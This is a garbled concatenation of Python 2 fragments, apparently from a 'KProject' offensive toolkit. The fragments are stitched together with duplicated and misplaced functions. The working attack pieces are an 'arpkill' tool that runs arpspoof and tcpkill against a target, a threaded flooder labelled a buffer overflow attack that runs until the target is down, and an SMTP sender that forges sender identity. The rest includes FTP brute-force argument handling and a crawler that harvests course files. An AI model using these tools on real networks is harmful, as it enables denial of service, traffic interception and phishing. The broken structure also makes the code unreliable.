def main():
global links, scanned
kpstd.norm('Get source from root target: ')
try:
src = urllib2.urlopen(target_root).read()
except Exception as e:
print("failed")
kpstd.error('Can not get source from root target.\n')
raise Exception(str(e))
else:
print("OK")
scanned.append(target_root)
scanned.append("http://data.ceh.vn/CEHv9-TV/")
for item in fetch_alink(src):
item = item.strip('/').strip('/').strip('/')
if item.endswith(".pdf") or item.endswith(".mp4") or item.endswith(
".avi"):
links.append(''.join([target_root, '/', item]))
kpstd.info('Found: %3d links\r' % len(links))
else:
if ''.join([target_root, '/', item]) not in scanned:
if not item.startswith('?'):
loop_getlinks(''.join([target_root, '/', item]))
scanned.append(''.join([target_root, '/', item]))
kpstd.norm('Scan done. Analyzing results.\n')
pdf_links = []
mp4_links = []
avi_links = []
for item in links:
if item.endswith('.pdf'):
pdf_links.append(item)
elif item.endswith('.mp4'):
mp4_links.append(item)
else:
avi_links.append(item)
kpstd.norm('Analyzed results.\n')
kpstd.info('Scanned: %3d links\n' % len(scanned))
kpstd.info('Found: %3d pdf | %3d mp4 | %3d avi\n' %
(len(pdf_links), len(mp4_links), len(avi_links)))
kpstd.info('Writing data to file: ')
for i in pdf_links:
fout.write('%s\n' % i)
fout.flush()
fout.write('\n')
for i in mp4_links:
fout.write('%s\n' % i)
fout.flush()
fout.write('\n')
for i in avi_links:
fout.write('%s\n' % i)
fout.flush()
print(" OK")
def parse_args():
global ftp_host, ftp_uinp, ftp_pinp
if len(sys.argv) != 4:
usage()
exit(1)
usage(intro=True)
ftp_host = sys.argv[1]
# port set default
ftp_uinp = sys.argv[2].split(';')
ftp_pinp = sys.argv[3].split(';')
uinp_tmp = []
pinp_tmp = []
for ui in ftp_uinp:
if not os.path.isfile(ui):
kpstd.error('Invalid file path: `%s`' % ui)
exit(1)
else:
uinp_tmp.append(ui)
for pi in ftp_pinp:
if not os.path.isfile(pi):
kpstd.error('Invalid file path: `%s`' % pi)
exit(1)
else:
pinp_tmp.append(pi)
ftp_uinp = uinp_tmp
ftp_pinp = pinp_tmp
def main():
a = sys.argv
if len(a) != 8:
kpstd.error('not enough args.\n')
usage()
exit()
mailer = Mail(a[1], a[2], a[3], a[4], a[5], a[6], a[7])
mailer.send()
def get_data(url, verbose=True):
try:
src = urllib2.urlopen(url).read()
except Exception as e:
if verbose:
print("Failed")
kpstd.error("Exception: %s\n" % str(e))
return None
else:
return src
def get_gateway(interface='wlan0'):
# >>> n.gateways()
# {'default': {2: ('192.168.1.1', 'wlan0'), 10: ('fe80::1', 'wlan0')}, 2: [('192.168.1.1', 'wlan0', True)], 10: [
# ('fe80::1', 'wlan0', True)]}
for item in netifaces.gateways()[netifaces.AF_INET]:
if item[1] == interface:
return item[0]
else:
kout.error('can\'t find the gateway\n')
print(netifaces.gateways()[netifaces.AF_INET])
return None
def resolve_mx(self):
lmx = list()
try:
for item in dns.resolver.query(self.host, 'MX'):
# 10 mail.example.com. => mail.example.com
lmx.append(item.to_text().split()[1][:-1])
except dns.resolver.NXDOMAIN:
kpstd.error("can't resolve to mail server for host '%s\n'" %
self.host)
exit()
else:
self.lmx = lmx
return lmx
def parse_args():
global INTERFACE, GATEWAY, TARGET
if len(sys.argv) < 3:
banner()
kout.error('at least 2 arguments from commandline.\n')
usage()
os._exit(1)
elif '-h' in sys.argv:
banner()
usage()
else:
INTERFACE = sys.argv[1]
GATEWAY = get_gateway(INTERFACE)
TARGET = sys.argv[2]
def main():
if os.name != 'posix':
kpstd.error("Only support on POSIX (GNU/Linux) machine.\n")
quit()
resolv_conf = '/etc/resolv.conf'
kpstd.info('Writing data: ')
try:
with open(resolv_conf, 'w') as f:
f.write('nameserver 8.8.8.8\n')
f.write('nameserver 8.8.4.4\n')
print("OK")
except Exception as e:
print("Failed")
kpstd.error("Cannot change dns: " + str(e) + "\n")
# disable IPv6
os.system('echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6')
def main():
if len(sys.argv) == 1:
usage()
exit()
# Filter subnetmask address and integer:
subnm = []
integ = []
error = False
nerro = []
for item in sys.argv[1:]:
if is_subnm(item):
subnm.append(item)
elif is_int(item):
integ.append(int(item))
else:
error = True
nerro.append(item)
# Report errors and exit:
if error:
for item in nerro:
kpstd.error("Unknow type of argument: %s\n" % item)
exit()
# Converting:
if integ:
kpstd.info("Integer convert:\n")
for i in integ:
print(" %3d: %-15s" % (i, int2sub(i)))
if subnm:
kpstd.info("Subnetmask address convert:\n")
for i in subnm:
print(" %-15s: %3d" % (i, sub2int(i)))
kpstd.info("Exiting.\n")
def main():
if len(sys.argv) != 2:
kpstd.error("Just 1 argument.\n")
kpstd.norm("Usage: python %s single_string/file\n" % sys.argv[0])
raise Exception("Parameter(s) error.")
arg = sys.argv[1]
if not os.path.isfile(arg):
kpstd.info("MD5 hash for '%s': %s\n" % (arg, md5.md5(arg).hexdigest()))
exit()
# arg is file
kpstd.info("Trying to read file '%s': " % arg)
try:
farg = open(arg)
fout = None
except IOError as e:
print("Failed")
kpstd.error("Can not open file '%s'\n" % arg)
if type(e) == tuple:
e = e[len(e) - 1]
raise Exception(str(e))
else:
print("OK")
kpstd.info("Loading data: ")
try:
lines = farg.readlines()
except Exception as e:
print("failed")
kpstd.error("Error on loading data.\n")
raise e
else:
print "OK"
if len(lines) >= 20:
kpstd.info("Specify a file to store hashes (blank for none): ")
fout = raw_input()
if fout:
fout = open(fout, 'w')
else:
fout = False
if fout:
counter = 0
for l in lines:
counter += 1
l = l.strip('\n').strip(' ')
fout.write('%s: %s\n' % (l, md5.md5(l).hexdigest()))
kpstd.info('Progress: %d/%d \r' % (counter, len(lines)))
print
kpstd.info("Done. Exiting.\n")
else:
kpstd.info("Dumping hashes...\n")
for l in lines:
l = l.strip('\n').strip(' ')
print("%s: %s" % (l, md5.md5(l).hexdigest()))
kpstd.info("Done. Exiting\n")
def main():
global t_arpspoof, t_tcpkill
if os.name != 'posix':
kout.error('Only support on GNU/Linux system.\n')
os._exit(1)
parse_args()
kout.info('arpkill is running.\n')
kout.info('attack information:\n')
kout.out('\tinterface: %s\n' % INTERFACE)
kout.out('\tgateway : %s\n' % GATEWAY)
kout.out('\ttarget : %s\n' % TARGET)
cmd_arpspoof = 'arpspoof -i %s -t %s %s -r' % (INTERFACE, GATEWAY, TARGET)
cmd_tcpkill = 'tcpkill -i %s net %s' % (INTERFACE, TARGET)
run_arpspoof = lambda: sp.Popen(
cmd_arpspoof.split(), stdout=sp.PIPE, stderr=sp.PIPE, shell=False)
run_tcpkill = lambda: sp.Popen(
cmd_tcpkill.split(), stdout=sp.PIPE, stderr=sp.PIPE, shell=False)
kout.info('arpspoof is running\n')
t_arpspoof = threading.Thread(target=run_arpspoof).start()
kout.info('tcpkill is running\n')
t_tcpkill = threading.Thread(target=run_tcpkill).start()
try:
while True:
time.sleep(1000)
except KeyboardInterrupt:
kout.info('waiting for all threads to stop.\n')
os.system('killall arpspoof tcpkill >/dev/null')
t_main = threading.current_thread()
for thread in threading.enumerate():
if thread != t_main:
threading.join(thread)
kout.info('all threads are stopped.\n')
return
def send(self):
for server in self.resolve_mx():
client = socket.socket()
kpstd.info("trying to connect to %s ... " % server)
try:
client.connect((server, 25))
except Exception as e:
kpstd.out("failed.\n")
kpstd.error("error occured. Stop sending message!\n")
kpstd.error("Exception: %s\n" % str(e))
continue
else:
kpstd.out("OK!\n")
try:
kpstd.info('stage 1: ')
data = client.recv(1000)
if '220' in data:
kpstd.out("success \n")
else:
kpstd.out("unknow status: '%s'\n" % data)
kpstd.info('stage 2: ')
client.send('HELO %s\r\n' % self.fakehost)
data = client.recv(1000)
if '250' in data:
kpstd.out("success \n")
else:
kpstd.out("unknow status: '%s'\n" % data)
kpstd.info('stage 3: ')
client.send('MAIL FROM:<%s>\r\n' % self.mail_from)
data = client.recv(1000)
if '250' in data:
kpstd.out("success \n")
else:
kpstd.out("unknow status: '%s'\n" % data)
kpstd.info('stage 4: ')
client.send('RCPT TO:<%s>\r\n' % self.rcpt_to)
data = client.recv(1000)
if '250' in data:
kpstd.out("success \n")
else:
kpstd.out("unknow status: '%s'\n" % data)
kpstd.info('stage 5: ')
client.send('DATA\r\n')
data = client.recv(1000)
if '354' in data or 'data' in data:
kpstd.out("success \n")
else:
kpstd.out("unknow status: '%s'\n" % data)
kpstd.info('stage 6: ')
import datetime as dt
client.send('From: "%s" <%s>\r\n' %
(self.mail_name, self.mail_from))
client.send('To: "%s" <%s>\r\n' %
(self.rcpt_name, self.rcpt_to))
client.send('Date: Thu %s 00:00:00 +0100\r\n' \
%(dt.datetime.strftime(dt.date(2017, 1, 12), '%d %B %Y')))
client.send('Subject: %s\r\n\r\n%s\r\n.\r\n' \
%(self.subject, self.content))
data = client.recv(1000)
if '250' in data:
kpstd.out("success \n")
else:
kpstd.out("unknow status: '%s'\n" % data)
kpstd.info('seding fake email complete!\n')
kpstd.info('closing connection\n')
client.send('QUIT')
client.close()
break
except Exception as e:
print
kpstd.error('error occured!\n')
raise e
# Report errors and exit:
if error:
for item in nerro:
kpstd.error("Unknow type of argument: %s\n" % item)
exit()
# Converting:
if integ:
kpstd.info("Integer convert:\n")
for i in integ:
print(" %3d: %-15s" % (i, int2sub(i)))
if subnm:
kpstd.info("Subnetmask address convert:\n")
for i in subnm:
print(" %-15s: %3d" % (i, sub2int(i)))
kpstd.info("Exiting.\n")
#
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
kpstd.norm("User quit.\n")
except Exception as e:
kpstd.error("Error: " + str(e) + "\n")
def main():
if len(sys.argv) == 1:
usage()
exit()
def check(arg, laccept):
for i in laccept:
if arg == i:
return True
else:
return False
for arg in sys.argv:
if check(arg, ('--help', )):
usage()
exit()
elif check(arg, ('--version', )):
print(''.join([prog.name, prog.version]))
exit()
elif check(arg, ('-h', '--host')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
if not target.name:
kpstd.error("No host found.\n")
print
usage()
exit()
else:
target.name = sys.argv[sys.argv.index(arg) + 1]
elif check(arg, ('-p', '--port')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
kpstd.warn(
"No argument for option `port` found. Using port: 80\n")
else:
port = sys.argv[sys.argv.index(arg) + 1]
if port.startswith('-'):
kpstd.warn(
"No argument for option `port` found. Using port: 80\n"
)
elif not port.isdigit():
kpstd.warn(
"Value for option `port` is invalid (%s). Using 80 as default.\n"
% port)
else:
try:
target.port = int(port)
except ValueError as e:
kpstd.error(
"Can not convert integer port from string(%s). Using port:80\n"
% port)
target.port = 80
else:
if target.port > 65535:
kpstd.error(
"Value for port must be less than 65535. Using port:80\n"
)
target.port = 80
elif check(arg, ('-t', '--threads')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
kpstd.warn(
"No argument for option `threads` found. Using default: 5\n"
)
else:
threads = sys.argv[sys.argv.index(arg) + 1]
if threads.startswith('-'):
kpstd.warn(
"No argument for option `threads` found. Using default: 5\n"
)
elif not threads.isdigit():
kpstd.warn(
"Value for option `threads` is invalid (%s). Using 5 as default.\n"
% threads)
else:
try:
target.threads = int(threads)
except ValueError as e:
kpstd.error(
"Can not convert integer threads from string(%s). Using default 5\n"
% threads)
target.threads = 5
else:
if target.threads > 100:
kpstd.warn("Really? %d threads? It maybe take your computer down first instead of target.\n"\
%(target.threads))
kpstd.info(
"Re-input value for option `threads` (blank to apply current value): "
)
newval = raw_input().strip(' ')
if not newval:
kpstd.info(
"Apply attacking target with %d threads.\n"
% target.threads)
elif not newval.isdigit():
kpstd.error(
"Invalid value for thread! Using 5 threads as default.\n"
)
target.threads = 5
else:
target.threads = int(newval)
kpstd.info("Apply new data: %d threads\n" %
target.threads)
elif check(arg, ('-l', '--limit')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
kpstd.warn(
"No argument for option `limit` found. Using limit: 100\n")
else:
limit = sys.argv[sys.argv.index(arg) + 1]
if limit.startswith('-'):
kpstd.warn(
"No argument for option `limit` found. Using 100.\n")
elif not limit.isdigit():
kpstd.warn(
"Value for option `limit` is invalid (%s). Using 100 as default.\n"
% limit)
else:
try:
target.limit_down = int(limit)
except ValueError as e:
kpstd.error(
"Can not convert integer limit from string(%s). Using 100.\n"
% limit)
target.limit_down = 100
elif check(arg, ('-q', )):
target.verbose = False
elif check(arg, ('-f', '--file')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
kpstd.warn("No argument for option `file` found.\n")
raise Exception("Argument is missing.")
elif not os.path.isfile(sys.argv[sys.argv.index(arg) + 1]):
kpstd.error(
"Can't open file `%s`. Please, recheck arguments.\n" %
(sys.argv[sys.argv.index(arg) + 1]))
raise Exception("Open file error.")
else:
packet.data = [sys.argv[sys.argv.index(arg) + 1]]
elif check(arg, ('-d', '--data')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
kpstd.warn("No argument for option `data` found.\n")
else:
packet.data = sys.argv[sys.argv.index(arg) + 1]
packet.datalen = len(packet.data)
elif check(arg, ('-n', '--num')):
if sys.argv.index(arg) + 1 >= len(sys.argv):
kpstd.warn("No argument for option `num` found.\n")
continue
num = sys.argv[sys.argv.index(arg) + 1]
if not num.isdigit():
kpstd.error("Invalid value for option `num`: %s\n" % num)
raise Exception("Parse int value error.")
else:
packet.ndata = int(num)
del num
print("%s - KProject BufferOverflow Attack version %s" %
(prog.name, prog.version))
print("Copyright (c) 2016 by Nick Lauri")
if not target.name:
kpstd.error("No target is specified.\n")
return
else:
kpstd.info("Testing target is alive: ")
try:
socket.socket().connect((target.name, target.port))
except Exception as e:
print("failed")
kpstd.error("Target seems to be down or something goes wrong.\n")
target.is_alive = False
raise Exception(e)
else:
print("target is alive!")
target.is_alive = True
if type(packet.data) == list:
kpstd.info("Loading data: ")
try:
packet.data = open(packet.data[0]).read()
packet.datalen = len(packet.data)
except Exception as e:
print("failed")
if type(e) == tuple:
e = e[len(e) - 1]
raise Exception(str(e))
else:
print("OK")
if not packet.data:
packet.data = 'A'
packet.datalen = 1
if not packet.ndata:
packet.ndata = 1000
else:
packet.datalen = len(packet.data)
if not packet.ndata:
_count = 1
while _count * packet.datalen <= 1000:
_count += 1
packet.ndata = _count
del _count
packet.datalen = len(packet.data)
kpstd.info("Attack infomation: \n")
print(" - target : %s" % target.name)
print(" - port : %d" % target.port)
print(" - threads: %d" % target.threads)
print(" - datalen: %d" % packet.datalen)
print(" - clone : %d" % packet.ndata)
kpstd.info("Attack is starting.\n")
kpstd.info("Press Ctr+C to stop attacking.\n")
thread_manager(attack, target.threads,
(target.name, target.port, packet.data, packet.ndata),
target.verbose)
def thread_manager(func, num, target_tuple_args, verbose=True):
"""
thread_manager(target, num, *arg, **kwarg)
- target: target function
- num : inital number of threads
- arg : (tuple) args of function
- kwarg : (dict) args of function
"""
time_start = time.time()
time_end = False
try:
while True:
if len(threading.enumerate()) - 1 < num:
try:
th = threading.Thread(target=func, args=(target_tuple_args[0], target_tuple_args[1], \
target_tuple_args[2], target_tuple_args[3]))
th.start()
except Exception as e:
kpstd.error("Can not start thread.\n")
print e
error.thread += 1
if verbose:
kpstd.info("Thread active: %2d/%2d | sent: %d packets (%s - %s/s) | error: %d:%d:%d:%d \r" \
%(len(threading.enumerate()) -1, num, packet.sent, bytesformat(packet.datalen*packet.ndata*packet.sent), bytesformat(float(packet.sent*packet.datalen*packet.ndata)/(time.time() - time_start)),\
error.send, error.thread, error.socket, error.connect))
if not target.is_alive:
#print ' '*80 + '\r'
time_end = time.time()
kpstd.info(
"\nTarget seems to be down. Stop attacking? (Y/n): ")
choice = raw_input()
if choice.lower() == 'n':
target.limit_down += 100
error.current_count = 0
else:
raise Exception
except KeyboardInterrupt:
if not time_end:
time_end = time.time()
packet.veloc = bytesformat(
float(packet.sent * packet.datalen * packet.ndata) /
(time_end - time_start))
print
kpstd.info('Quit? (Y/n): ')
choice = raw_input()
if choice.lower() == 'n':
thread_manager(func, num, target_tuple_args, verbose)
else:
kpstd.info('Waiting for all threads stop: ')
main_thread = threading.current_thread()
for thread in threading.enumerate():
if thread != main_thread:
thread.join()
print 'OK'
return
except Exception:
if not time_end:
time_end = time.time()
packet.veloc = bytesformat(
float(packet.sent * packet.datalen * packet.ndata) /
(time_end - time_start))
print
kpstd.info('Waiting for all threads stop: ')
main_thread = threading.current_thread()
for thread in threading.enumerate():
if thread != main_thread:
thread.join()
print 'OK'
return
kpstd.info("Attack is starting.\n")
kpstd.info("Press Ctr+C to stop attacking.\n")
thread_manager(attack, target.threads,
(target.name, target.port, packet.data, packet.ndata),
target.verbose)
#
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print
kpstd.error("User quit.\n")
except Exception as e:
if type(e) == tuple or type(e) == list:
e = e[len(e) - 1]
kpstd.error("Error: %s\n" % str(e))
if packet.sent:
kpstd.info("Statistics:\n")
print(" - Packet sent : %d" % packet.sent)
print(" - Total : %s" %
bytesformat(packet.sent * packet.datalen * packet.ndata))
print(" - avg_v : %s/s" % packet.veloc)
print(" - Send errors : %d" % error.send)
print(" - Thread errors : %d" % error.thread)
print(" - Socket errors : %d" % error.socket)
print(" - Connect errors: %d" % error.connect)
try:
while True:
time.sleep(1000)
except KeyboardInterrupt:
kout.info('waiting for all threads to stop.\n')
os.system('killall arpspoof tcpkill >/dev/null')
t_main = threading.current_thread()
for thread in threading.enumerate():
if thread != t_main:
threading.join(thread)
kout.info('all threads are stopped.\n')
return
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
if t_tcpkill or t_arpspoof:
kout.info('Waiting for all threads to stop.')
os.system('killall arpspoof tcpkill >/dev/null')
t_main = threading.current_thread()
for thread in threading.enumerate():
if thread != t_main:
threading.join(thread)
kout.error('user quit.\n')
os._exit(1)
else:
kout.info('exitting.\n')
kpstd.info('Scanned: %3d links\n' % len(scanned))
kpstd.info('Found: %3d pdf | %3d mp4 | %3d avi\n' %
(len(pdf_links), len(mp4_links), len(avi_links)))
kpstd.info('Writing data to file: ')
for i in pdf_links:
fout.write('%s\n' % i)
fout.flush()
fout.write('\n')
for i in mp4_links:
fout.write('%s\n' % i)
fout.flush()
fout.write('\n')
for i in avi_links:
fout.write('%s\n' % i)
fout.flush()
print(" OK")
#
try:
main()
except KeyboardInterrupt:
print
kpstd.error('User quit\n')
except Exception:
kpstd.error('Exiting...\n')